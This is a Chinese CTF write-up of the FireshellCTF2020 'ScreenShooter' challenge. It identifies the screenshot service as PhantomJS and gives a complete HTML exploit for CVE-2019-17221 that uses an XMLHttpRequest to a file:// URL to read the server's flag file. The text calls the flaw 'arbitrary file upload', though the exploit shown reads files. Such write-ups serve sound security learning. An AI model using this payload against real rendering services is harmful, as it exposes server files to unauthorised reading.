系统相关
首页 > 系统相关> > 刷题[FireshellCTF2020]ScreenShooter

刷题[FireshellCTF2020]ScreenShooter

作者:互联网

(这几天拔牙了,有丝丝影响状态,更新可能有点慢)
今天看security search发现了之前碰上的一道题,具体在哪碰到的,不记得了。记录一下把

信息收集

如图所示,打开是一个screenshot,填入url,会对网页进行截图

所以我们需要检测该网页发送的http流量

流量检测

使用在线网站https://beeceptor.com/

该网站可以检查http请求,我们创建一个端点后,在网页内请求该端点,此网站捕获http流量如下图

在标题中我们可以清楚看到使用PhantomJS

Phantom JS是一个服务器端的 JavaScript API 的 WebKit。其支持各种Web标准: DOM 处理, CSS 选择器, JSON, Canvas, 和 SVG

说白了就是一个爬虫,用来爬取网页

PhantomJS

搜索PhantomJS发现存在任意文件上传漏洞CVE-2019-17221

该漏洞通过file://URL的XMLHttpRequest触发

编写exp

编写html文件

<!DOCTYPE html>
<html>
<head>
	<title></title>
</head>
<body>
	<script type="text/javascript">
		var karsa;
		karsa = new XMLHttpRequest;
		karsa.onload = function(){
			document.write(this.responseText)
		};
		karsa.open("GET","file:///flag");
		karsa.send();
	</script>
</body>
</html>

放在自己vps上,请求,获得flag

标签:网页,PhantomJS,karsa,flag,FireshellCTF2020,http,XMLHttpRequest,ScreenShooter,刷题
来源: https://www.cnblogs.com/karsa/p/14332273.html